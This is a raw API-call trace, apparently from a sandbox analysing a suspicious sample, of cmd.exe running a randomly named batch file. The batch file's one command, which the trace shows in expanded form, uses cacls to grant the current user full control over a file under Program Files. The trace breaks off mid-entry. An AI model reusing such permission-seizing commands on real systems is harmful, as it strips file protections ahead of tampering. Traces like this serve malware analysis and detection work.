GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0285.357] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0285.358] GetConsoleTitleW (in: lpConsoleTitle=0xcba9a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0286.100] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0286.172] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0286.172] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0286.172] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0286.173] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0286.173] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0286.173] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0286.173] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0286.173] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0286.173] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0286.173] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0286.174] GetConsoleTitleW (in: lpConsoleTitle=0x9df720, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0286.416] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0286.416] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0286.416] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0286.416] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0286.416] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0286.416] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0286.416] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0286.416] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0286.416] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0286.416] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0286.416] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0286.416] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0286.416] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0286.416] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0286.416] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0286.416] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0286.416] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0286.416] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0286.416] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0286.416] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0286.416] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0286.416] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0286.416] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0286.416] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0286.416] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0286.416] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0286.416] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0286.416] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0286.416] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0286.416] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0286.416] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0286.416] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0286.416] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0286.416] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0286.416] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0286.416] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0286.416] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0286.416] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0286.416] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0286.417] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0286.417] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0286.417] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0286.417] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0286.417] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0286.417] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0286.417] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0286.417] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0286.417] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0286.417] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0286.417] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0286.417] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0286.417] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0286.417] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0286.417] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0286.417] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0286.417] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0286.417] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0286.417] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0286.417] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0286.417] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0286.417] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0286.417] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0286.417] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0286.417] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0286.417] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0286.417] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0286.417] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0286.417] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0286.417] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0286.418] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0286.418] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0286.418] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0286.418] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0286.418] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0286.418] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0286.418] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0286.418] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0286.418] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0286.418] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0286.418] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0286.418] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0286.418] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0286.418] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0286.418] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0286.418] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0286.418] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0286.418] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0286.418] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0286.419] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0286.419] SetErrorMode (uMode=0x0) returned 0x0 [0286.419] SetErrorMode (uMode=0x1) returned 0x0 [0286.419] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0xcb05d0, lpFilePart=0x9df22c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9df22c*="Desktop") returned 0x1d [0286.419] SetErrorMode (uMode=0x0) returned 0x1 [0286.420] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0286.420] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0286.422] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0286.422] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0x9defd8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9defd8) returned 0xcbb128 [0286.423] FindClose (in: hFindFile=0xcbb128 | out: hFindFile=0xcbb128) returned 1 [0286.423] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0286.423] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0286.423] GetConsoleTitleW (in: lpConsoleTitle=0x9df4ac, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0286.941] ApiSetQueryApiSetPresence () returned 0x0 [0286.941] ResolveDelayLoadedAPI () returned 0x745414a0 [0286.943] SaferWorker () returned 0x0 [0286.954] SetErrorMode (uMode=0x0) returned 0x0 [0286.954] SetErrorMode (uMode=0x1) returned 0x0 [0286.954] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0xcbad10, lpFilePart=0x9df35c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x9df35c*="vRnqNMBW.bat") returned 0x2a [0286.954] SetErrorMode (uMode=0x0) returned 0x1 [0286.955] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\"", _Control=" \x09") returned 0x1 [0286.955] CmdBatNotificationStub () returned 0x1 [0286.955] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x9df3ec, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0286.955] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0286.955] _get_osfhandle (_FileHandle=3) returned 0xb4 [0286.955] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0286.955] _get_osfhandle (_FileHandle=3) returned 0xb4 [0286.955] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0286.955] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x9df3bc, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x9df3bc*=0xe2, lpOverlapped=0x0) returned 1 [0286.956] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0286.956] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0286.957] _get_osfhandle (_FileHandle=3) returned 0xb4 [0286.957] GetFileType (hFile=0xb4) returned 0x1 [0286.957] _get_osfhandle (_FileHandle=3) returned 0xb4 [0286.957] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0286.957] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0286.957] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0286.957] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0286.957] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0286.957] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0286.957] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0286.958] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0286.958] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0286.959] _tell (_FileHandle=3) returned 32 [0286.959] _close (_FileHandle=3) returned 0 [0286.959] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df180 | out: _Buffer="\r\n") returned 2 [0286.959] _get_osfhandle (_FileHandle=1) returned 0x3c [0286.959] GetFileType (hFile=0x3c) returned 0x2 [0286.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0286.960] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df158 | out: lpMode=0x9df158) returned 1 [0287.044] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.044] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df170, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df170*=0x2) returned 1 [0287.855] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0287.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0287.856] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x9df17c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0287.856] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x9df17c | out: _Buffer=">") returned 1 [0287.856] _get_osfhandle (_FileHandle=1) returned 0x3c [0287.856] GetFileType (hFile=0x3c) returned 0x2 [0287.856] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0287.856] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df15c | out: lpMode=0x9df15c) returned 1 [0288.449] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.449] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x9df174, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x9df174*=0x1e) returned 1 [0288.606] _get_osfhandle (_FileHandle=1) returned 0x3c [0288.606] GetFileType (hFile=0x3c) returned 0x2 [0288.606] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0288.606] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3fc | out: lpMode=0x9df3fc) returned 1 [0289.776] _get_osfhandle (_FileHandle=1) returned 0x3c [0289.776] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xcb7850*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x9df414, lpReserved=0x0 | out: lpBuffer=0xcb7850*, lpNumberOfCharsWritten=0x9df414*=0x5) returned 1 [0290.059] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x9df41c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\" /E /G CIiHmnxMn6Ps:F /C ") returned 79 [0290.059] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.059] GetFileType (hFile=0x3c) returned 0x2 [0290.059] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.059] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df3f4 | out: lpMode=0x9df3f4) returned 1 [0290.284] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.284] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x4f, lpNumberOfCharsWritten=0x9df40c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df40c*=0x4f) returned 1 [0290.364] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9df430 | out: _Buffer="\r\n") returned 2 [0290.364] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.365] GetFileType (hFile=0x3c) returned 0x2 [0290.365] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0290.365] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x9df408 | out: lpMode=0x9df408) returned 1 [0290.608] _get_osfhandle (_FileHandle=1) returned 0x3c [0290.608] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x9df420, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x9df420*=0x2) returned 1 [0290.612] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0290.612] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0290.612] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0290.612] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0290.612] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0290.612] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0290.612] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0290.612] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0290.612] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0290.612] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0290.612] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0290.612] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0290.612] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0290.612] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0290.612] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0290.612] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0290.612] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0290.612] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0290.612] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0290.612] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0290.612] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0290.612] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0290.612] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0290.612] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0290.612] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0290.612] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0290.612] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0290.612] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0290.612] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0290.612] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0290.612] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0290.612] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0290.612] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0290.612] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0290.612] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0290.612] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0290.612] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0290.612] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0290.612] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0290.612] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0290.612] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0290.612] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0290.613] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0290.613] SetErrorMode (uMode=0x0) returned 0x0 [0290.613] SetErrorMode (uMode=0x1) returned 0x0 [0290.613] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xcbbe88, lpFilePart=0x9df1cc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x9df1cc*="Desktop") returned 0x1d [0290.613] SetErrorMode (uMode=0x0) returned 0x1 [0290.613] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0290.613] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0290.614] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0290.614] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.614] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xffffffff [0290.616] GetLastError () returned 0x2 [0290.616] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.617] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xffffffff [0290.617] GetLastError () returned 0x2 [0290.617] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0290.617] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xcbc220 [0290.617] FindClose (in: hFindFile=0xcbc220 | out: hFindFile=0xcbc220) returned 1 [0290.617] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xffffffff [0290.617] GetLastError () returned 0x2 [0290.617] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x9def58, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x9def58) returned 0xcbc220 [0290.617] FindClose (in: hFindFile=0xcbc220 | out: hFindFile=0xcbc220) returned 1 [0290.617] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0290.617] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0290.617] GetConsoleTitleW (in: lpConsoleTitle=0x9defa0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0290.647] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0290.647] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0290.647] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0290.647] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0290.647] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0290.647] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0290.647] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0290.647] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0290.647] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0290.647] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0290.647] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0290.647] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0290.647] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0290.647] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0290.647] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0290.647] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0290.647] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0290.647] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0290.647] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0290.647] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0290.647] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0290.647] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0290.647] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0290.647] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0290.647] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0290.647] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0290.647] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0290.648] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0290.648] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0290.648] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0290.648] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0290.648] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0290.648] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0290.648] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0290.648] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0290.648] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0290.648] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0290.648] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0290.648] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0290.648] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0290.648] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0290.648] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0290.648] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0290.648] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0290.648] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0290.648] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0290.648] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0290.648] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0290.648] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0290.648] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0290.648] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0290.648] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0290.648] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0290.648] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0290.648] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0290.648] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0290.648] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0290.648] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0290.648] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0290.648] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0290.648] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0290.648] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0290.648] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0290.648] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0290.648] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0290.648] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0290.648] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0290.648] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0290.648] 